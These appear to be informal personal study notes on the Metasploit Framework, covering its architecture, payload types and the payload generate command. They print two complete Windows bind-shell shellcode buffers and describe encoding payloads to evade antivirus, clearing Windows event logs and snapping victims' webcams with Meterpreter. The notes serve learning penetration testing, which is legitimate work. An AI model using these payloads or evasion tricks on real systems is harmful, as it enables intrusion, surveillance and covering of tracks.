notes for the metasploit

the complete guide for the msf is https://www.offensive-security.com/metasploit-

unleashed/

best book to study msf is :-

every thing is told in well way

the file can be accessed with in /usr/share/metasploit-framework

the msf architecture is like

***MSF::CORE*** //(it contain the db modulemanager pluginsmanager)

provides the basic apii

***MSF::BASE*** //(contain config loging sessioins and all )

provide the friendly api

some api to use for the framework //see the architecture photo
https://www.offensive-security.com/wp-content/uploads/2015/04/msfarch2-768x502.png

and at the base it contain the module which are 6 in count

1. exploit
2. encode
3. payload
4. nops
5. post
6. auxiliary

***MSF::UI***
above all these we have msf::ui

contain the cli the (msfconsole / msfcli (now removed) )

webui
gui and some driver

the type of payload

1. singles:- this contain all the shit in it and can get the shell by simple nc or
socat.These are more stable buz it contian all in it.

2. stager :- it work in conjunction with stage payloads in order to perform the

task it connect the vitcim and us in a channel and reads the stages on the remote
host(a.k.a vitcim)

3. stages
these are payload that are downloaded by the stafer module.
it provide the advance feature wirh no size limits such as meterpreter,
vnc injection
**(The Virtual Network Computing (VNC) is a graphical desktop sharing system that
uses the Remote Frame Buffer (RFB) protocol to remotely control another computer. )
**

ipwn **( iPwn is a framework meant for exploiting and gaining access to iOS
devices.)**for "iphone"

***METERPRETER***
meterpreter short form of meta-interpreter is an advance, multi-faceted payload
that operates by

dll injection **(a technique used for running code within the address space of
another process by forcing it to load a dynamic-link library. DLL injection is
often used by external programs to influence the behavior of another program in a
way its authors did not anticipate or intend.)**

the meterpreter resides completely in the host memory and leaves no traces hard to
trace with forensic techniques.

=========
Payloads
==========

***PASSIVEX***
PassiveX is a payload that can help in circumventing restrictive outbound
firewalls. It does this by using an ActiveX control to create a hidden instance of
Internet Explorer. Using the new ActiveX control, it communicates with the attacker
via HTTP requests and responses

***NoNX***

The NX (No eXecute) bit is a feature built into some CPUs to prevent code from
executing in certain areas of memory. In Windows, NX is implemented as Data
Execution Prevention (DEP). The Metasploit NoNX payloads are designed to circumvent
DEP.

Ord

Ordinal payloads are Windows stager based payloads that have distinct advantages
and disadvantages. The advantages being it works on every flavour and language of
Windows dating back to Windows 9x without the explicit definition of a return
address. They are also extremely tiny. However two very specific disadvantages make
them not the default choice. The first being that it relies on the fact that
ws2_32.dll is loaded in the process being exploited before exploitation. The second
being that it’s a bit less stable than the other stagers.

IPv6

The Metasploit IPv6 payloads, as the name indicates, are built to function over
IPv6 networks.

Reflective DLL injection

Reflective DLL Injection is a technique whereby a stage payload is injected into a

compromised host process running in memory, never touching the host hard drive. The
VNC and Meterpreter payloads both make use of reflective DLL injection.

***genterating the/a payload for metasploit***

okay this work like when we select a payload to use framework add the generate,
pry, reload cmd

the most simple will be pass the generate cmd

and out put goes like

```
msf6 payload(windows/shell_bind_tcp) > generate
# windows/shell_bind_tcp - 328 bytes
# https://metasploit.com/
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, CreateSession=true
buf =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" +
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" +
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" +
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" +
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" +
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32" +
"\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff" +
"\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b" +
"\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40\x50\x68" +
"\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89\xe6" +
"\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" +
"\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57" +
"\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" +
"\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" +
"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" +
"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" +
"\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" +
"\x6f\x6a\x00\x53\xff\xd5"

```

The sample code above contains an almost universal bad character, the null byte
(\x00). Granted some exploits allow us to use it but not many. Let’s generate the
same shellcode only this time we will instruct Metasploit to remove this unwanted
byte.

To accomplish this, we issue the generate command followed by the -b switch with
accompanying bytes we wish to be disallowed during the generation process.
```
msf6 payload(windows/shell_bind_tcp) > generate -b '\x00'
# windows/shell_bind_tcp - 355 bytes
# https://metasploit.com/
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, CreateSession=true
buf =
"\xbb\x56\x23\x74\xe5\xdb\xdd\xd9\x74\x24\xf4\x5e\x33\xc9" +
"\xb1\x53\x31\x5e\x12\x03\x5e\x12\x83\x90\x27\x96\x10\xe0" +
"\xc0\xd4\xdb\x18\x11\xb9\x52\xfd\x20\xf9\x01\x76\x12\xc9" +
"\x42\xda\x9f\xa2\x07\xce\x14\xc6\x8f\xe1\x9d\x6d\xf6\xcc" +
"\x1e\xdd\xca\x4f\x9d\x1c\x1f\xaf\x9c\xee\x52\xae\xd9\x13" +
"\x9e\xe2\xb2\x58\x0d\x12\xb6\x15\x8e\x99\x84\xb8\x96\x7e" +
"\x5c\xba\xb7\xd1\xd6\xe5\x17\xd0\x3b\x9e\x11\xca\x58\x9b" +
"\xe8\x61\xaa\x57\xeb\xa3\xe2\x98\x40\x8a\xca\x6a\x98\xcb" +
"\xed\x94\xef\x25\x0e\x28\xe8\xf2\x6c\xf6\x7d\xe0\xd7\x7d" +
"\x25\xcc\xe6\x52\xb0\x87\xe5\x1f\xb6\xcf\xe9\x9e\x1b\x64" +
"\x15\x2a\x9a\xaa\x9f\x68\xb9\x6e\xfb\x2b\xa0\x37\xa1\x9a" +
"\xdd\x27\x0a\x42\x78\x2c\xa7\x97\xf1\x6f\xa0\x54\x38\x8f" +
"\x30\xf3\x4b\xfc\x02\x5c\xe0\x6a\x2f\x15\x2e\x6d\x50\x0c" +
"\x96\xe1\xaf\xaf\xe7\x28\x74\xfb\xb7\x42\x5d\x84\x53\x92" +
"\x62\x51\xc9\x9a\xc5\x0a\xec\x67\xb5\xfa\xb0\xc7\x5e\x11" +
"\x3f\x38\x7e\x1a\x95\x51\x17\xe7\x16\x4c\xb4\x6e\xf0\x04" +
"\x54\x27\xaa\xb0\x96\x1c\x63\x27\xe8\x76\xdb\xcf\xa1\x90" +
"\xdc\xf0\x31\xb7\x4a\x66\xba\xd4\x4e\x97\xbd\xf0\xe6\xc0" +
"\x2a\x8e\x66\xa3\xcb\x8f\xa2\x53\x6f\x1d\x29\xa3\xe6\x3e" +
"\xe6\xf4\xaf\xf1\xff\x90\x5d\xab\xa9\x86\x9f\x2d\x91\x02" +
"\x44\x8e\x1c\x8b\x09\xaa\x3a\x9b\xd7\x33\x07\xcf\x87\x65" +
"\xd1\xb9\x61\xdc\x93\x13\x38\xb3\x7d\xf3\xbd\xff\xbd\x85" +
"\xc1\xd5\x4b\x69\x73\x80\x0d\x96\xbc\x44\x9a\xef\xa0\xf4" +
"\x65\x3a\x61\x04\x2c\x66\xc0\x8d\xe9\xf3\x50\xd0\x09\x2e" +
"\x96\xed\x89\xda\x67\x0a\x91\xaf\x62\x56\x15\x5c\x1f\xc7" +
"\xf0\x62\x8c\xe8\xd0"

```

this time it avoid the \x00 (null byte )

also see the size of the bytess it is larger

During generation, the null bytes’ original intent, or usefulness in the code,
needed to be replaced (or encoded) in order to ensure, once in memory, our bind
shell remains functional.

metasploit use the best encoder to remove the unmwanted data after using `-b` and
the unwanted data

if the many unwanted code is passed to the msf and if it is not capable of encoding
it then it will show an error msg on the console
It’s like removing too may letters from the alphabet and asking someone to write a
full sentence. Sometimes it just can’t be done.

okay we done with generating the payload now we will try to encode the payload
***ENCODING THE PAYLOAD DURING GENERATION***

As already said the framework will use the best encoder possible when generating
the payload. There are many times when one needs to use a specific type, of encoder
rather what metasploit think.

If everything went according to plan, our payload will not contain any alphanumeric
characters. But we must be careful when using a different encoder other than the
default. As it tends to give us a larger payload. For instance, this one is much
larger than our previous examples.

Our next option on the list is the -f switch. This gives us the ability to save our
generated payload to a file instead of displaying it on the screen. As always it
follows the generate command with file path.

///Generating Payloads with Multiple Passes///

==============================================

The next switch is -i (iteration). In a nutshell it tells the msf how many time to
encode the payload and it must do before producing the final payload. doing this
would be stealth, or anti-virus evasion(escaping,avoiding)

as we pass the -i 2 the size of the payload increase as more it will be the size
will increse. tthe first bytes of the code will not be same any more.

the more iteration(-i) will be the version of our payload less prone to detection

okay bydefault the lport for bind shell is 4444 we will change it to 1234 by `-o`
switch as show below

-o lport=1234,variable=value
you can change any value like this as you want it before encoding the payload

///Payload Generation Using a NOP Sled///

==========================================

when generating the payload bydefault output will be in `ruby` not everyone use to
code in it. we have a option to give our payload in different language ex- c, perl,
java.

First let’s look at a few different output formats and see how the -t switch is
used. Like all the other options all that needs to be done is type in the switch
followed by the format name as displayed in the help menu.

it will go like `generate -t c `

or `generate -t java`

the output in different languages

Adding a NOP (No Operation or Next Operation) sled is accomplished with the -s
switch followed by the number of NOPs. This will add the sled at the beginning of
our payload. Keep in mind the larger the sled the larger the shellcode will be. So
adding a 10 NOPs will add 10 bytes to the total size.

syntax `generate -s 14`

Store Information in a Database Using Metasploit

=============================================
===============================================
==================================================

Setup our Metasploit Database

In Kali, you will need to start up the postgresql server before using the database.

`root@kali:~# systemctl start postgresql

After starting postgresql you need to create and initialize the msf database with
msfdb init`

`root@kali:~# msfdb init

Creating database user 'msf'
Enter password for new role:
Enter it again:
Creating databases 'msf' and 'msf_test'
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema`

THE DB WILL BE SPERATE WITH IN DB FILE NAME WITH ALL CONTENT SAVED IN IT.

METERPRETER CMD USED

-------------------
clearev :- used for window to remove security logs on a windows system.

idletime:- it will display the number of seconds that the user at the remote
machine has been idle

webcam_list:- will display available web cams on the target host.

webcam_snap:- cmd grabs a picture from a connected web cam on the target system

you can also load the python to the meterpreter can export the string or import
can make the shell as python interpreter

-------------------------------
================================
`auxiliary/scanner/ip/ipidseq`
================================
---------------------------------

special type of ip sequence scanner module in msf

`msf > use auxiliary/sniffer/psnuffle`

another module for password sniffing on server

# AVODING DETECION OF ANTIVIRUS

the best way of avoiding the detection is encoded the payload with encoder and that
also with the multi-encoder

it also happen when some time the avg(tool to detect virus)

some time it will detect the same payload some time it's due to the flag capture
max time it will note

``{ addition:: a tool is their out which allow you to specify the wake time of
payload fucking amazing} ``

At earilier their are different tools which are now added with in the frame work
( wanna enclude the encoder)

We can also encode the payload with other processes also

# THE HEAP SPRAY

a NOPs no-operation instruction

a payload of 90 in intel x86 assembly is a nop

\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
...........snipt.....................

sorry to say but study for the nops and heap spray book page 112

i don't have mood right now so seeking whole chapter (chapter no-8)

###### SETOOLKIT ####################################